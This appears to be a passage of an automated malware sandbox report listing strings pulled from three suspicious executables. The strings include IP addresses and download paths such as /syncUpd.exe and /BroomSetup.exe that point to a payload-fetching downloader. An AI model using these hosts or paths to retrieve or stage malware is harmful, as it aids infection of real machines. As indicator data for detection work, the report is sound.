Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Command line argument: one | 11_2_00424B3E
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Command line argument: one | 11_2_00424B3E
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Command line argument: two | 11_2_00424B3E
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Command line argument: two | 11_2_00424B3E
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Command line argument: three | 11_2_00424B3E
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Command line argument: three | 11_2_00424B3E
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Command line argument: four | 11_2_00424B3E
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Command line argument: four | 11_2_00424B3E
Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exe | Command line argument: five | 11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: five11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: six11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: six11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: seven11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: seven11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: eight11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: eight11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: nine11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: nine11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: ten11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: ten11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: one11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: two11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: three11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: four11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: five11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: six11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: seven11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: eight11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: nine11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: ten11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.9011_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.9011_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.9011_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Installed11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Installed11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.5911_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.5911_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /syncUpd.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /syncUpd.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.5911_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /syncUpd.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /1/Qg_Appv5.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /1/Qg_Appv5.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /1/Qg_Appv5.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Qg_Appv5.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Qg_Appv5.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /BroomSetup.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /BroomSetup.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /BroomSetup.exe11_2_00424B3E
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: @11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: one11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: one11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: two11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: two11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: five11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: five11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: seven11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: seven11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: eight11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: eight11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: nine11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: nine11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: ten11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: ten11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.9011_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.9011_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.9011_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Installed11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Installed11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.5911_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.5911_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /syncUpd.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /syncUpd.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.5911_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /syncUpd.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /1/Qg_Appv5.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /1/Qg_Appv5.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /1/Qg_Appv5.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Qg_Appv5.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: Qg_Appv5.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /BroomSetup.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /BroomSetup.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: 185.172.128.22811_2_05BD4DA5
                        Source: C:\Users\user\Pictures\yPlMO3UKyKRvoEYPhbGYOyT0.exeCommand line argument: /BroomSetup.exe11_2_05BD4DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: one19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: one19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: two19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: two19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: three19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: three19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: four19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: four19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: five19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: five19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: six19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: six19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: seven19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: seven19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: eight19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: eight19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: nine19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: nine19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: ten19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: ten19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: one19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: two19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: three19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: four19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: five19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: six19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: seven19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: eight19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: nine19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: ten19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.9019_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.9019_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.9019_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Installed19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Installed19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.5919_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.5919_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /syncUpd.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /syncUpd.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.5919_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /syncUpd.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /1/Qg_Appv5.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /1/Qg_Appv5.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /1/Qg_Appv5.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Qg_Appv5.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Qg_Appv5.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /BroomSetup.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /BroomSetup.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /BroomSetup.exe19_2_00424B3E
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: @19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: one19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: one19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: two19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: two19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: five19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: five19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: seven19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: seven19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: eight19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: eight19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: nine19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: nine19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: ten19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: ten19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.9019_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.9019_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.9019_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Installed19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Installed19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.5919_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.5919_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /syncUpd.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /syncUpd.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.5919_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /syncUpd.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /1/Qg_Appv5.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /1/Qg_Appv5.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /1/Qg_Appv5.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Qg_Appv5.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: Qg_Appv5.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /BroomSetup.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /BroomSetup.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: 185.172.128.22819_2_05D04DA5
                        Source: C:\Users\user\Pictures\B46afLBMY0mokUgVdA9CQR52.exeCommand line argument: /BroomSetup.exe19_2_05D04DA5
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: one21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: one21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: two21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: two21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: three21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: three21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: four21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: four21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: five21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: five21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: six21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: six21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: seven21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: seven21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: eight21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: eight21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: nine21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: nine21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: ten21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: ten21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: one21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: two21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: three21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: four21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: five21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: six21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: seven21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: eight21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: nine21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: ten21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.9021_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.9021_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.9021_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: Installed21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: Installed21_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_00424B3E
                        Source: C:\Users\user\Pictures\t7IXQJi6R3tWUMJ8f9cQzMWm.exeCommand line argument: 185.172.128.22821_2_00424B3E
